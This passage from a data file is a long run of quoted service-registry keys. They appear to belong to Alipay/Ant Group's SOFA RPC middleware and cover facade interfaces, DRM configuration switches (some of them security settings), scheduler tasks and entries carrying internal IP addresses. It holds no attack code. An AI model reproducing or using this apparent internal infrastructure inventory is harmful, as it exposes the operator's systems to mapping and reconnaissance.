@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.baoxianmerchant.common.service.api.InsMerchantAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.totalUrlDecodeTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:miniappweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_STORAGEMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.stockassetcore.common.service.facade.api.MsgRemindSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.172.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.placeSafetyProdIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zpaas.zappinfo.facade.update.FrontRepositoryUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.uctmonitor.api.UctStrategyQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcswitchbase.facade.AssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.dataqualityOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cloudprovision.cloudprovision_ds.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.UserSecurityRiskService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.AttachmentFacade:1.0:insendorseprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.messagebox.MessageBoxFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainprod.common.facade.query.CommonListPageQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.18.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:zfcertifycenter_antprocess_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlecenter.common.event.route.EventDispatcher:1.0:rpcEventDispatcherService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:protocol-https#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.mpromocenter:name=com.alipay.mpromocenter.client.drm.LabelClientDrmSwitch.localCacheClear,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:agmcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeDRMConfigureImpl.eventBufLoadCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.muac.api.facade.qdb.TrapGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_10.15.232.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.linka:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.ptcore.common.service.facade.api.product.ProductQueryFacade:1.0:MYBKC1CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditdmp.facade.PcdmpIndexManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.sdk.risk.bizchgdefense.callback.BizRiskDefenseCallbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianFlushPeriod,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sdabombardier.common.service.facade.relationship.IotDeviceAppIdAccountThingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:abnclprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.facade.DecisionService:1.0:lbs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdMerchantOrderPageQueryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundcardprod.common.service.datatransfer.DataLoaderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.116.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iotcore.spi.MessageSpi:1.0:antassistant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.184.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fcrcportal:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.hyp.common.service.facade.HyToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_TRADE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.heralib.service.facade.api.ComputeQueryServiceFacade:1.0:zdataquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.assets.api.facade.service.TablePartitionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.AppletConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_IPAYCORE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mcomment.common.service.facade.backmanagement.MarketingManagementQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseSelfHealingFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mmtcapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdataquery.common.service.facade.api.AggregateSettleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbmaterialcenter.common.service.facade.api.GroupManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.common.service.integration.fintradecenter.AllowanceDetailQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insdataprod.common.service.facade.task.api.InsTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.biz.service.impl.drm.CacheTrigger.addData,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbshopdecorate.common.service.facade.kbserv.decorate.CateDecorateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fastq.easytest.external.apitest.service.http.HttpApiTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qagraphknowledge.common.support.xray.asm.ace.LinkBAceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:inshealthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifinflux.common.service.facade.ChannelContractSwitchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.investtrade.facade.api.security.SecurityDealBaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:cnamlmatrix@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.fullchain.NewbieFullChainDispatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_editMerchantInfoCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.biz.manage.manager.EinvoiceGlobalCollectionManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.consumequery.common.service.facade.FundItemRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.ck:name=com.alipay.zdal.config.groupCluster.riskmng_riskmngPartnerDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inscommunity.common.service.facade.RecipientCommunityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.BizDecisionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opencore.search.facade.AppSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestcore.common.service.facade.service.invest.InvestCaseSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkinstassetprod.common.service.facade.api.IaLiquidPlnFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-PCINSTDATA-DAILY-TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundmng.common.service.facade.InstWithdrawOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:unitradeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zbdm.common.service.facade.biz.BizTableInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.agdsccalipay.jiebei.facade.service.JieBeiCreditQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:simpleOpenShopAuditFinishPublisher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.PartnerCoBuildingTopologyRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.CommoditiesTransferOrderLmyhRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbmall.facade.shop.indirect.IndirectMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.findecision.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.guardianconsole.facade.configs.service.GuardianJiuzhouFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.HeartbeatCheck:1.0:opscloudflow@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.common.service.facade.orderlink.OrderLinkSettleAdjustFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.schemacenter.common.service.facade.api.serviceschema.SpmServiceSchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.chargefront.GoldenDataSource.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininfo.common.service.facade.mng.query.InfoSerialQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:iotcms@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobile.mdevsupport.facade.alarmanalysis.AlarmWriteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_zskynet_alarmcheck#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.166.151.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insclaiminvestprod.facade.transport.TransportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.selectcore.common.service.facade.api.TagEntityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:bizfund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","sdaappdist@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.fcbuservice.common.service.facade.manager.BuEventManager:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.spi.InstinfoSystemCallService:1.0:insclaimportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.speech.SpeechFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.himalayas.services.crm.facade.intent.IntentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.ResSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:finsmarttwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mordercenter.MocQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:muac@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finsnsbff:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.productpkg.ProfitDataConfirmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.escapeSchemeChecks,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebillcenter.common.service.facade.InstOweInfoQueryCallbackFacade:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iris.facade.dayu.IrisDayuAbilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapires.facade.admin.BusinessStatisticManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.common.facade.resource.facade.RequestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:pcloanmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.mng.api.OutputService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sictrl.common.service.facade.IsmisTrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.recommendTabStarNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloudstrategy.facade.onekeysite.OneKeyDownSiteCalcFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.187.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.45.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbcdp.common.service.facade.calendar.CalendarTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csassistant.service.facade.api.AssistantConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchant.common.service.facade.SwitchCoreGrayService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.common.service.facade.api.MsgHandleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.loan.api.FinancingTemplateEleCstrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.spi.OperationConfigCallbackFacade:1.0:paygrowth_batchtwophase_strategy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmepinfocenter.common.service.facade.api.baseinfo.EpAssetsInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:promoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.123.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.facade.api.prototype.PlayQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelspop.service.decision.workbench.channel.ChannelRuleOptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcomment.common.service.facade.api.count.CountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifecore.core.service.policy.PolicyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciaasconnectorcore.facade.conn.HBaseConn:1.0:0000001008@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.orderlink.OrderLinkBatchAdjustProcessService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.open.facade.hydra.OpenRelatedContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.refund.service.TradeRefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rds.common.service.facade.service.RdsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.security.auth.facade.query.AuthQueryService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opscloudprod.facade.search.OpsCldSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.fcbuservice.common.service.facade.operatelog.OperateLogFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.callback.OpsChngRiskServiceCallback:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.127.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.ext.payment.service.ack.gfas.GfasAdvancePayAckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:dimensionPublishProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.HealthMustKnowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.168.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.spcenter.facade.business.business.BusinessApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.rebanlanceTaskExeTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicenter.common.service.facade.api.gray.DeviceWhitelistOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.icrowdservice.facade.match.PromoMatchFacade:1.0:icrowdservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.138.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.omocore.common.outbound.facade.RoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.linku.common.service.facade.cache.CacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.PermissionService:1.0:instopen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.common.service.integration.acctrans.AccountQueryClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:inspectprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_IPAYMENT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.paymentmng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache_dest.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:antbuservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ztesla.common.service.facade.service.api.ABStageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.apibus.facade.UnitedApiBusInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.cache.LocalCacheManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:alisofa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.financeha.sdk.biz.ficc.api.FiccHaDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwdsds.common.service.facade.sensitive.service.SensitiveDataService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpromobatch.common.service.spi.BatchDetailProcessCallback:1.0:kbservindustryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.biz.service.msgbroker.facade.SaftyCertifyReleaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:unitradeadapter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MOBILEACAUTH#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.task.TaskApplyRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.prizecore.common.service.facade.service.CampSplitAmountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcpcsprod.common.service.facade.MerchantInvolvementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:openauth@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue4#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.familycore.facade.RelationGraphDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricecenter.common.service.facade.api.adjust.AdjustQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.fixVoucherSupport2Prize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:unimetasvccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:dsmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.userSecurityCheckBatchSizeStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.meshyorg.common.service.facade.handler.ApplyCallbackHandler:1.0:activityAuditCallbackHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.clientConfigCustomPush,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.aclinkedcore.common.service.facade.PipelineExecutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:ctuofflineplt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mshopcenter.common.service.facade.api.NoteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbgotone.common.service.facade.PushSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.ZonemngFlowOpsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payrouter.common.service.facade.cache.BusinessFailResultCachedHandler:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcsmart.facade.competitor.CompetitorTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.debittrans.service.facade.ipaytrans.api.IpayAccountManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcmerchantprod.facade.dataservice.HbIsvDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbopenprod.common.service.facade.shopapp.ShopAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bbcmng.common.service.facade.FundRiskModelingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","dadeploymentunit@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_O_REVMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.150.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iexratecenter.service.facade.api.ExRatePubRuleMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.